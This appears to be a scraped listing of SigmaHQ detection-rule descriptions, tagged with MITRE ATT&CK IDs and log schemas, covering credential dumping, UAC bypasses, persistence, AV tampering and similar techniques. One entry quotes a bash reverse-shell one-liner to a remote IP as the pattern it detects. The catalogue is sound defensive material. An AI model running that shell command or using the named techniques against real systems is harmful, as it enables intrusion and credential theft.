Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).

SigmaHQ source
T1685
imRegistry

Detects the removal of folders from the "ProtectedFolders" list of Exploit Guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the p

exploit
SigmaHQ source
imFileEvent

Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs".

SigmaHQ source
T1036T1003.001
imProcessCreate

Detects suspicious use of XORDump process memory dumping utility

SigmaHQ source
T1137T1008T1546
imFileEvent

Detects the creation of a macro file for Outlook.

SigmaHQ source
T1137.006
imFileEvent

Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).

SigmaHQ source
T1095
imProcessCreate

Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network

SigmaHQ source
imFileEvent

Detects creation of files with the ".pub" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents

SigmaHQ source
T1137T1008T1546
imFileEvent

Detects the creation of a macro file for Outlook.

SigmaHQ source
T1615T1059.005
imProcessCreate

Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs", which can be used to gather information about the target machine

SigmaHQ source
T1070T1112
imRegistry

Detects the deletion of registry keys containing the MSTSC connection history

SigmaHQ source
T1546.003
imProcessCreate

Detects a WMI backdoor in Exchange Transport Agents via WMI event filters

backdoorwmi
SigmaHQ source
T1557.001
imProcessCreate

Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)

SigmaHQ source
T1218.005
imProcessCreate

Detects potential LethalHTA technique where the "mshta.exe" is spawned by an "svchost.exe" process

SigmaHQ source
imRegistry

Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence. The disk cleanup manager is part of the operating system. It displays the dialog box […] Th

backdoorpersistence
SigmaHQ source
T1560.001
imProcessCreate

Detects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it porta

backdoor
SigmaHQ source
T1003.002
imProcessCreate

Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the

credential-theft
SigmaHQ source
T1003.002
imProcessCreate

Detects usage of the Quarks PwDump tool via commandline arguments

SigmaHQ source
T1574.001T1112
imProcessCreate

Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)

SigmaHQ source
T1134.001T1134.002
imProcessCreate

Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting

cobalt-strike
SigmaHQ source
T1563.002
imProcessCreate

Detects RDP session hijacking by using MSTSC shadowing

SigmaHQ source
T1133
imProcessCreate

Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)

exploit
SigmaHQ source
T1557.001
imProcessCreate

Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an Active Directory network by coercing authentication from machine accounts and relaying it to the certificate service

SigmaHQ source
T1087.001T1087.002T1482T1069.001T1069.002T1059.001
imProcessCreate

Detects command line parameters used by Bloodhound and Sharphound hack tools

SigmaHQ source
T1055
imProcessCreate

Detects the use of the Dinject PowerShell cradle based on the specific flags

powershell
SigmaHQ source
T1110.002
imProcessCreate

Detects execution of hashcat.exe with a SAM file exported from the Windows registry and a password list to crack it against

SigmaHQ source
T1090
imProcessCreate

Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass)

evasion
SigmaHQ source
T1110T1110.001
imProcessCreate

Detects command line parameters used by Hydra password guessing hack tool

SigmaHQ source
T1053
imProcessCreate

Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms

persistence
SigmaHQ source
imProcessCreate

Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones are used to host the DNS records for a particular domain.

backdoor
SigmaHQ source
T1543.003T1574.011
imProcessCreate

Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.

persistence
SigmaHQ source
T1027.005
imProcessCreate

Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and t

evasion
SigmaHQ source
T1204.002
imProcessCreate

Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)

SigmaHQ source
T1204.002
imProcessCreate

Detects a suspicious process spawning from an Outlook process.

SigmaHQ source
T1685
imProcessCreate

Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData.

SigmaHQ source
T1685
imProcessCreate

Detects Request to "amsiInitFailed" that can be used to disable AMSI Scanning

evasion
SigmaHQ source
T1127
imProcessCreate

Detects the execution of node.exe, which is shipped with multiple software products such as VMware and Adobe, in order to execute arbitrary code, for example to establish a reverse shell as seen in Log4j attacks.

SigmaHQ source
T1053.005T1059.001
imProcessCreate

Detects suspicious powershell execution via a scheduled task where the command ends with suspicious flags to hide the powershell instance instead of executing scripts or commands. This could be a s

persistencepowershell
SigmaHQ source
T1055
imProcessCreate

Detects potential process injection via Microsoft Remote Assistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many thre

persistence
SigmaHQ source
imProcessCreate

Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection

SigmaHQ source
T1036.003
imProcessCreate

Detects the execution of a renamed "jusched.exe" as seen used by the cobalt group

SigmaHQ source
imProcessCreate

Detects execution of renamed Remote Utilities (RURAT) via Product PE header field

backdoor
SigmaHQ source
T1218.001
imProcessCreate

Detects the execution of malicious OneNote documents that contain embedded scripts. When a user clicks on a OneNote attachment and then on the malicious link inside the ".one" file, it exports and exe

SigmaHQ source
T1003
imProcessCreate

Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it

credential-theft
SigmaHQ source
T1203
imProcessCreate

Detects a JAVA process running with remote debugging allowing more than just localhost to connect

SigmaHQ source
T1552.001
imProcessCreate

Detects when the file "passwd" or "shadow" is copied from tmp path

SigmaHQ source
T1685
imProcessCreate

Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modify or tamper with Windows Defender AV

powershell
SigmaHQ source
T1059.001T1027T1620
imProcessCreate

Detects base64 encoded .NET reflective loading of Assembly

powershell
SigmaHQ source
T1572
imProcessCreate

Execution of plink to perform data exfiltration and tunneling

backdoor
SigmaHQ source
T1027T1140T1059.001
imProcessCreate

Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string

powershell
SigmaHQ source
T1564.002
imRegistry

Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being l

SigmaHQ source
imProcessCreate

Detects common command used to enable bpf kprobes tracing

SigmaHQ source
T1572
imProcessCreate

Execution of ssh.exe to perform data exfiltration and tunneling through RDP

backdoor
SigmaHQ source
T1190T1210
imProcessCreate

Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)

exploit
SigmaHQ source
T1505.004
imProcessCreate

Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors

backdoor
SigmaHQ source
imProcessCreate

Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)

exploit
SigmaHQ source
T1218T1547
imRegistry

Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'

persistence
SigmaHQ source
T1190
imWebSession

Detects possible Java payloads in web access logs

SigmaHQ source
imProcessCreate

Detects usage of "query.exe" a system binary to exfil information such as "sessions" and "processes" for later use

SigmaHQ source
T1071.001T1102.001T1102.003
imWebSession

Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form

SigmaHQ source
T1539T1555.003T1005
imProcessCreate

Detect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing.

SigmaHQ source
T1539T1005
imProcessCreate

Detect usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.

SigmaHQ source
T1562.004
imProcessCreate

Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic

SigmaHQ source
T1562.004
imProcessCreate

Detects attempts to force stop the ufw using ufw-init

SigmaHQ source
T1049
imProcessCreate

Detects usage of system utilities to discover system network connections

SigmaHQ source
T1553.004
imProcessCreate

Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.

SigmaHQ source
T1564
imProcessCreate

Detects execution of the "mount" command with the "hidepid" parameter to make processes invisible to other users on the system

SigmaHQ source
imProcessCreate

Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine

evasionpowershell
SigmaHQ source
T1070.006
imProcessCreate

Detects usage of the "touch" process in service file.

SigmaHQ source
T1059.001
imProcessCreate

Detects powershell scripts that import modules from suspicious directories

powershell
SigmaHQ source
T1055.001
imProcessCreate

Detects potential DLL injection and execution using "Tracker.exe"

PowerShell SAM Copy
sigma high
SigmaHQ source
T1003.002
imProcessCreate

Detects suspicious PowerShell scripts accessing SAM hives

powershell
SigmaHQ source
T1546.013
imFileEvent

Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a means of persistence

SigmaHQ source
T1003.003
imFileEvent

Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory

SigmaHQ source
T1547
imFileEvent

Detects a phishing attack which expands a ZIP file containing a malicious shortcut. If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP fil

SigmaHQ source
T1003.002
imFileEvent

Detects the creation of files that look like exports of the local SAM (Security Account Manager)

SigmaHQ source
T1027
imFileEvent

Detects files dropped by Winnti as described in RedMimicry Winnti playbook

SigmaHQ source
T1552.004
imProcessCreate

Detects a "Get-Process" cmdlet and its aliases on the lsass process, which is in almost all cases a sign of malicious activity

credential-theftpowershell
SigmaHQ source
T1564
imFileEvent

Once executed, colorcpl.exe will copy the arbitrary file to c:\windows\system32\spool\drivers\color\

SigmaHQ source
T1059.001
imProcessCreate

Commandline to launch powershell with a base64 payload

powershell
SigmaHQ source
T1593.003
imProcessCreate

Detects execution of "git" in order to clone a remote repository whose name contains suspicious keywords

SigmaHQ source
T1059.001
imProcessCreate

Detects suspicious powershell invocations from interpreters or unusual programs

powershell
SigmaHQ source
imProcessCreate

Detects suspicious PowerShell invocation command parameters

powershell
SigmaHQ source
T1059.001
imProcessCreate

Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0

powershell
SigmaHQ source
T1059
imProcessCreate

Detects execution of commands and binaries from the context of the Program Compatibility Assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.

evasion
SigmaHQ source
T1548
imFileEvent

Detects the creation of a doas.conf file on a Linux host.

SigmaHQ source
T1053.003
imFileEvent

Detects creation of a cron file or files in cron directories which could indicate potential persistence.

SigmaHQ source
T1053.003
imFileEvent

Detects creation of a sudoers file or files in the "sudoers.d" directory which can be used as a potential method to persist privileges for a specific user.

SigmaHQ source
T1218T1055
DeviceImageLoadEvents

Detect usage of the "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.

SigmaHQ source
T1564.004
imProcessCreate

Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.

SigmaHQ source
imFileEvent

Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.

SigmaHQ source
T1053.003
imFileEvent

Detects the creation of "ebpfbackdoor" files in both the "cron.d" and "sudoers.d" directories, both of which are related to the TripleCross persistence method

Change the Fax Dll
sigma high
SigmaHQ source
T1112
imRegistry

Detects possible persistence via a Fax DLL load when the service restarts

persistence
SigmaHQ source
T1112
imRegistry

Detects a change of the user account associated with the FAX service to avoid the escalation problem.

SigmaHQ source
T1490
imProcessCreate

Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil

powershellransomwarewmi
SigmaHQ source
T1070
imFileEvent

Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence

SigmaHQ source
T1564.004
imProcessCreate

Extract data from cab file and hide it in an alternate data stream

SigmaHQ source
imProcessCreate

Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the Raspberry Robin attack

SigmaHQ source
imProcessCreate

Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity

SigmaHQ source
T1027T1059.001
imProcessCreate

Detects Obfuscated Powershell via COMPRESS OBFUSCATION

evasionpowershell
SigmaHQ source
T1218
imProcessCreate

Detect usage of the "runexehelper.exe" binary as a proxy to launch other programs

SigmaHQ source
imProcessCreate

Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install

backdoorpowershell
SigmaHQ source
T1505.003
imProcessCreate

Detects suspicious sub processes of web server processes

SigmaHQ source
T1083
imProcessCreate

Detects usage of "find" binary in a suspicious manner to perform discovery

SigmaHQ source
T1531
imProcessCreate

Detects execution of the "groupdel" binary, which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks

SigmaHQ source
T1531
imProcessCreate

Detects execution of the "userdel" binary, which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks

SigmaHQ source
T1560.001
imProcessCreate

An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities

backdoor
SigmaHQ source
T1552.002
imProcessCreate

Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Ad

backdoorcredential-theft
SigmaHQ source
T1003.002
imRegistry

Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\System\CurrentControlSet\Services\VSS\Diag\VolSnap\Volume are captured.

apt
SigmaHQ source
T1218
imProcessCreate

Detects the use of stordiag.exe to execute schtasks.exe, systeminfo.exe and fltmc.exe

SigmaHQ source
T1218
imProcessCreate

Detects using WorkFolders.exe to execute an arbitrary control.exe

JNDIExploit Pattern
sigma high
SigmaHQ source
T1190
imWebSession

Detects exploitation attempt using the JNDI-Exploit-Kit

SigmaHQ source
T1496
imProcessCreate

Detects command line parameters or strings often used by crypto miners

SigmaHQ source
T1059.004
imNetworkSession

Detects a bash process connecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')

SigmaHQ source
T1546.010
imRegistry

DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll

SigmaHQ source
T1105
imProcessCreate

Detects usage of COM objects that can be abused to download files in PowerShell by CLSID

powershell
SigmaHQ source
T1115
imProcessCreate

Detects usage of the 'Get-Clipboard' cmdlet via CLI

powershell
SigmaHQ source
T1059.001
imProcessCreate

Detects inline execution of PowerShell code from a file

powershell
SigmaHQ source
T1202
imProcessCreate

Detects suspicious Splwow64.exe process without any command line parameters

SigmaHQ source
T1218T1202
imProcessCreate

ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.

SigmaHQ source
T1574.001
imProcessCreate

The Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execut

evasion
SigmaHQ source
T1548.002T1574.001
DeviceImageLoadEvents

Attempts to load dismcore.dll after dropping it

evasion
WhoAmI as Parameter
sigma high
SigmaHQ source
T1033
imProcessCreate

Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)

SigmaHQ source
T1185
imProcessCreate

Detects browsers starting with the remote debugging flags, which is a technique often used to perform browser injection attacks

SigmaHQ source
T1185T1564.003
imProcessCreate

Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control

SigmaHQ source
T1132.001
imProcessCreate

Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.

powershell
SigmaHQ source
T1553.004
imProcessCreate

Detect use of X509Enrollment

SigmaHQ source
imProcessCreate

Detects usage of the "usermod" binary to add users to the root or sudoers groups

SigmaHQ source
T1112T1562
imRegistry

Potential adversaries stopping ETW providers recording loaded .NET assemblies.

SigmaHQ source
T1003.001
imRegistry

Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process

credential-theft
SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading using comctl32.dll to obtain system privileges

SigmaHQ source
imFileEvent

Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd

SigmaHQ source
imFileEvent

Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll"

SigmaHQ source
T1021.002T1021.003
imFileEvent

Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network

SigmaHQ source
T1021.002T1021.003
DeviceImageLoadEvents

Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class

SigmaHQ source
imProcessCreate

Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor

SigmaHQ source
T1105
imProcessCreate

Detects usage of the "type" command to download/upload data from WebDAV server

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software

SigmaHQ source
T1112
imProcessCreate

This rule detects the execution of Run Once task as configured in the registry

SigmaHQ source
T1685
imProcessCreate

Detects changes to environment variables related to ETW logging via the CommandLine. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.

SigmaHQ source
T1003.001
imFileEvent

Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Err

SigmaHQ source
T1547
imRegistry

Detects persistence registry keys for Recycle Bin

persistence
SigmaHQ source
T1055.001T1218.013
imProcessCreate

Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag

SigmaHQ source
imProcessCreate

Detects the usage of emojis in the command line, which could be a sign of potential defense evasion activity.

evasion
SigmaHQ source
imProcessCreate

Detects the usage of emojis in the command line, which could be a sign of potential defense evasion activity.

evasion
SigmaHQ source
imProcessCreate

Detects the usage of emojis in the command line, which could be a sign of potential defense evasion activity.

evasion
SigmaHQ source
imProcessCreate

Detects the usage of emojis in the command line, which could be a sign of potential defense evasion activity.

evasion
SigmaHQ source
T1059.005T1059.007
imFileEvent

Detects javaw.exe in AppData folder as used by Adwind / JRAT

SigmaHQ source
T1218T1003.001
DeviceImageLoadEvents

Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.

SigmaHQ source
T1047T1021.002
imFileEvent

Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.

SigmaHQ source
T1059.005T1059.007
imFileEvent

Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL. Adversaries can d

SigmaHQ source
T1046
imFileEvent

Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.

SigmaHQ source
T1546.003
imRegistry

Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.

SigmaHQ source
T1216
imFileEvent

Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)

SigmaHQ source
T1059.001
imProcessCreate

Detects suspicious ways to run Invoke-Execution using IEX alias

powershell
SigmaHQ source
T1608
imRegistry

Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.

SigmaHQ source
T1053.003
imProcessCreate

Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.

SigmaHQ source
T1518.001
imProcessCreate

Detects usage of system utilities (only grep and egrep for now) to perform security software discovery

SigmaHQ source
T1112
imRegistry

Detects tampering of RDP Terminal Service/Server sensitive settings, such as allowing unauthorized users access to a system via 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.

SigmaHQ source
T1546.008
imRegistry

Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen

backdoor
SigmaHQ source
T1562.001
imFileEvent

Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder. This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) o

SigmaHQ source
imProcessCreate

Detects the pattern of UAC Bypass using Event Viewer RecentViews

evasion
SigmaHQ source
imFileEvent

Detects the pattern of a UAC bypass using Windows Event Viewer

SigmaHQ source
T1222.001
imProcessCreate

Adversaries can interact with DACLs using the built-in Windows command takeown, which can grant adversaries higher permissions on specific files and folders

SigmaHQ source
T1053.005
imProcessCreate

Detects when an attacker tries to modify an already existing scheduled task to run from a suspicious location. Attackers can create a simple looking task in order to avoid detection on creation as it'

SigmaHQ source
T1543.003
imProcessCreate

Detects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths

powershell
SigmaHQ source
T1543.003
imProcessCreate

Detects service path modification via the "sc" binary to a suspicious command or path

SigmaHQ source
T1505.003
imWebSession

Detects common commands used in Windows webshells

SigmaHQ source
T1027T1059.001
imProcessCreate

Detects Obfuscated use of Clip.exe to execute PowerShell

evasionpowershell
SigmaHQ source
T1027T1059.001
imProcessCreate

Detects Obfuscated Powershell via VAR++ LAUNCHER

evasionpowershell
SigmaHQ source
imProcessCreate

Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools

lateral-movement
SigmaHQ source
T1003.003
imProcessCreate

Detects suspicious process patterns used in NTDS.DIT exfiltration

backdoor
SigmaHQ source
T1218
imProcessCreate

Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag

SigmaHQ source
T1546.002
imFileEvent

Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Po

SigmaHQ source
T1567T1568.002T1572T1090T1102
imNetworkSession

Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden data exfiltration by malicious actors

SigmaHQ source
T1127
imProcessCreate

Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.

SigmaHQ source
T1053.005
imProcessCreate

Detects creation of a scheduled task with a GUID like name

SigmaHQ source
T1071.001
imWebSession

Detects suspicious malformed user agent strings in proxy logs

SigmaHQ source
T1218
imProcessCreate

Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter

SigmaHQ source
T1569.002
imFileEvent

Detects default PsExec service filename which indicates PsExec service installation and execution

SigmaHQ source
imProcessCreate

Detects usage of the PowerShell New-MailboxExportRequest cmdlet to export a mailbox to a remote or local share, as used in ProxyShell exploitations

exploitpowershell
SigmaHQ source
T1566T1566.001T1574T1574.001
imFileEvent

Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious mo

SigmaHQ source
T1567.002
imWebSession

Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string

SigmaHQ source
T1220
DeviceImageLoadEvents

Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc). It could be a

evasionwmi
SigmaHQ source
T1546.003
imProcessCreate

Detects WMI script event consumers

persistencewmi
SigmaHQ source
T1087.001
imProcessCreate

Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet

powershell
SigmaHQ source
T1216
imProcessCreate

Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)

evasion
SigmaHQ source
T1012
imRegistry

This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent. This detection requires an access control entry (ACE) on the s

SigmaHQ source
T1012
imRegistry

This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS). Information from AD Health servi

SigmaHQ source
T1518
imProcessCreate

Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerabl

backdoor
SigmaHQ source
T1562.004
imProcessCreate

Detects disabling security tools

SigmaHQ source
T1556.002
imProcessCreate

Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS

credential-theft
SigmaHQ source
T1003T1003.003
imProcessCreate

Conti recommendation to its affiliates to use esentutl to access the dumped NTDS file. Trickbot also uses this utility to get MSEdge info via its module pwgrab.

credential-theft
SigmaHQ source
T1564.004
imProcessCreate

Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection

SigmaHQ source
T1074.001
imProcessCreate

Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by m

backdoorpowershell
SigmaHQ source
T1218
imProcessCreate

Executes an SCT script using scrobj.dll from a command entered into a specially prepared INF file.

SigmaHQ source
T1218
imProcessCreate

There is an option for the MS VS Just-In-Time Debugger "vsjitdebugger.exe" to launch a specified executable and attach a debugger. This option may be used by adversaries to execute malicious code by signed v

SigmaHQ source
T1505.002
imProcessCreate

Detects the installation of an Exchange Transport Agent

SigmaHQ source
T1562.001T1112
imRegistry

Detects NetNTLM downgrade attack

SigmaHQ source
T1059
DeviceImageLoadEvents

Detects processes loading modules related to PCRE.NET package

SigmaHQ source
T1059
imFileEvent

Detects processes creating temp files related to PCRE.NET package

Raccine Uninstall
sigma high
SigmaHQ source
T1685
imProcessCreate

Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.

ransomware
SigmaHQ source
T1548
imProcessCreate

Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe

SigmaHQ source
T1059.001T1021.006
imProcessCreate

Detects remote PowerShell sessions by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).

powershell
SigmaHQ source
T1125T1123
imRegistry

Detects processes accessing the camera and microphone from a suspicious folder

SigmaHQ source
T1547
imProcessCreate

Detects when a possible suspicious driver is being installed via pnputil.exe lolbin

SigmaHQ source
T1566.001
imProcessCreate

Detects a suspicious program execution in Outlook temp folder

SigmaHQ source
T1059.006
imProcessCreate

Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe

SigmaHQ source
T1572T1021.001
imProcessCreate

Detects suspicious Plink tunnel port forwarding to a local port

SigmaHQ source
T1218.011
imProcessCreate

Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452

SigmaHQ source
T1055
imProcessCreate

Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452

SigmaHQ source
T1053.005
imProcessCreate

Detects the creation of scheduled tasks that involves a temporary folder and runs only once

SigmaHQ source
T1202
imProcessCreate

Detects a service binary running in a suspicious directory

SigmaHQ source
T1218T1003.001
imProcessCreate

Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.

credential-theft
SigmaHQ source
T1548.002
imFileEvent

Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)

SigmaHQ source
T1548.002
imFileEvent

Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)

SigmaHQ source
T1548.002
imFileEvent

Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)

SigmaHQ source
T1548.002
imFileEvent

Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)

SigmaHQ source
T1548.002
imFileEvent

Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)

SigmaHQ source
T1548.002
imFileEvent

Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)

SigmaHQ source
T1548.002
imFileEvent

Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)

SigmaHQ source
T1047T1021.002
DeviceImageLoadEvents

Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.

wmi
Connection Proxy
sigma low
SigmaHQ source
T1090
imProcessCreate

Detects setting proxy configuration

SigmaHQ source
T1068T1190T1203
imProcessCreate

Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* pre

SigmaHQ source
T1068T1190T1203
imProcessCreate

Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Ag

Setuid and Setgid
sigma low
SigmaHQ source
T1548.001
imProcessCreate

Detects suspicious change of file privileges with chown and chmod commands

SigmaHQ source
T1127.001
imNetworkSession

Detects a possible remote connections to Silenttrinity c2

SigmaHQ source
T1083
imWebSession

Detects source code enumeration that use GET requests by keyword searches in URL strings

SigmaHQ source
T1190T1505.003
imFileEvent

Detects suspicious file type dropped by an Exchange component in IIS

SigmaHQ source
